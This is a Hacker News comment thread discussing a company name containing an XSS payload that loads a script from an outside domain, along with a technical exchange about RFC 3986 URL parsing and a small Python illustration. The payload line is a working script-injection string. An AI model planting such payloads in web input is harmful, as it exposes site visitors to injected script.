Will that even work without http:// or at least // in front of the domain name? ...

tim333 · on Oct 29, 2020

It seems to have worked a bit. Cut and paste from the guy who set up "><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

...

>I am in the process of contacting every website that has triggered my script which has a readily available contact for submitting security issues, or a hackerone account or similar. Alas, the sort of websites that have XSS problems rarely list IT security contacts.

wahern · on Oct 29, 2020

I don't think so. The traditional, canonical regular expression[1] for parsing a URL is

  ^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?

See https://tools.ietf.org/html/rfc3986#appendix-B

The authority section (which contains the host domain) must begin with "//", whether there's a scheme prefix or not. Otherwise it's just part of the path (or query or fragment). IIRC, these semantics are also fixed by HTML, such that any attribute like HREF or SRC is parsed as if using the canonical regex (but after entity substitution and whitespace trimming). Browsers might have implemented this differently many years ago, but I doubt it, as it would conflict with being able to use a bare path atom (e.g. foo.html).

[1] I normally eschew using regular expressions for proper parsing, but for URLs the canonical expression is both adequate and advisable for correctness.
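
To make the point above concrete, here is a minimal sketch in Python that applies the Appendix B expression to a few references. The helper name split_uri and the sample strings are only illustrative assumptions (the HTTPS form is a guess at what an unmunged reference might look like), and this shows how the regex splits a string, not how any particular browser behaves.

```python
import re

# Regular expression from RFC 3986, Appendix B.
URI_RE = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")

def split_uri(ref):
    """Split a URI reference into its five components (hypothetical helper)."""
    # Every group in the expression is optional, so match() always succeeds.
    m = URI_RE.match(ref)
    return {
        "scheme": m.group(2),
        "authority": m.group(4),
        "path": m.group(5),
        "query": m.group(7),
        "fragment": m.group(9),
    }

if __name__ == "__main__":
    # Illustrative inputs: bare name, network-path reference, full URL, bare file.
    for ref in ("MJT.XSS.HT", "//MJT.XSS.HT", "HTTPS://MJT.XSS.HT", "foo.html"):
        print(ref, split_uri(ref))
```

With no leading "//", the bare MJT.XSS.HT comes back with no authority and the whole string as the path, exactly like foo.html. Only the "//" and scheme-prefixed forms yield MJT.XSS.HT as the authority.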

bearbin · on Oct 29, 2020

It had HTTP originally; Twitter just munged it.